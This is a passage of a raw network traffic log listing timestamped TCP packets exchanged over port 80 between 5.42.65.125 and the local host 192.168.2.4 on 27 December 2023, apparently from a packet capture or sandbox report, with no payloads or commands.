Dec 27, 2023 18:12:24.094276905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.094330072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.095058918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.095104933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.095160961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.095894098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.095912933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.095958948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.096833944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.096846104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.096900940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.097655058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.097671986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.097717047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.098479033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.098539114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.098683119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.099251986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.099268913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.099313974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.100117922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.100131035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.100171089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.100959063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.100976944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.101018906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.101798058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.101810932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.101854086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.102744102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.102756977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.102790117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.103470087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.103482962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.103528023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.104310036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.104332924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.104581118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.105149984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.105164051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.105201006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.106024981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.106038094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.106081009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.106878042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.106890917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.106928110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.107767105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.107779980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.107835054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.108531952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.108545065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.108603001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.109426022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.109438896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.109489918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.110208035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.110225916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.110259056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.111083031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.111095905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.111136913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.111989021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.112001896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.112030029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.112732887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.112746000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.112777948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.113663912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.113676071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.113712072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.114388943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.114402056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.114449978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.115252018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.115264893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.115336895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.116180897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.116233110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.116275072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.116998911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.117019892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.117057085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.117773056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.117790937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.117846966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.118645906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.118702888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.118835926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.119456053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.119477987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.120307922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.120337963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.120351076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.120388031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.121206045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.121217966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.121313095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.122034073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.122047901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.122090101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.122821093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.122833967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.122880936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.123675108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.123707056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.123765945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.124469995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.124497890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.124583006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.125385046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.125408888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.126157999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.126235962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.126250029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.126282930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.127079010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.127100945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.127156973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.127902031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.127916098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.127953053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.128717899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.128751040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.128793955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.129570961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.129584074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.129631042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.130475044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.130489111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.130517960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.131253958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.131267071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.131320000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.132091999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.132106066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.132169008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.132965088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.132978916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.133023024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.133797884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.133812904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.133858919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.134608984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.134622097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.134663105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.135456085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.135471106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.135509014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.136317015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.136348009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.136382103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.137190104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.137202978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.137262106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.137968063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.138017893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.138161898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.138848066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.138868093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.139535904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.139689922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.139703035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.139740944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.140558958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.140575886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.140620947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.141454935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.141468048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.141500950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.142201900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.142215014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.142250061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.143042088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.143062115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.143110037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.143924952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.143937111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.143980026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.144769907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.144783020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.144819975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.145590067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.145601988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.145654917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.146511078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.146523952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.146562099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.147259951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.147272110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.147311926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.148123980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.148137093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.148173094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.148933887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.148947001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.149243116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.149804115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.149817944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.149862051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.150624037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.150638103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.150680065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.151456118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.151468992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.151519060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.152261972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.152302980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.152350903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.153170109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.153183937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.153219938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.153990030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.154030085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.154076099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.154834986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.154850006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.154905081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.155803919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.155818939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.155858994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.156904936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.156918049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.156995058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.159873962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.159898996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.159953117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.162005901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.162045002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.162194967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.165894032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.165914059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.165958881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.169226885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.169244051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.169302940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.169637918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.169651985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.169728041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.170547009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.170562983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.170612097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.171359062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.171377897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.171448946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.172760010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.172775984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.172836065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.172986984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.173000097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.173036098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.173876047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.173892021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.173937082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.174716949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.174735069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.174787045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.175587893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.175605059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.175832987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.176440001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.176460981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.176512003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.177203894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.177244902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.178113937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.178132057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.178160906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.178179026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.178950071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.179034948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.179078102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.179840088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.179860115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.179905891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.180630922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.180644989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.180682898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.181539059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.181554079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.181596994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.182254076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.182296991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.182832003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.183109045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.183140993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.183950901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.183968067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.184030056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.184874058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.184887886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.184937000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.185681105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.185694933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.185726881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.186729908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.186743021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.186783075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.187438965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.187453985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.187511921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.188267946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.188286066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.188332081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.189394951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.189409971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.189457893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.189881086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.189894915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.189939976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.190797091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.190810919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.190855026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.191565990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.191581011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.191626072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.192445040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.192461967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.192513943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.193304062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.193320036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.193360090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.194120884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.194138050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.194833994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.194967985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.194983959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.195015907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.196528912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.196548939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.196589947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.196595907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.196614027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.197429895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.197443962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.197499990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.198262930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.198276997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.198318958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.199167967 CET	80	49738	5.42.65.125	192.168.2.4
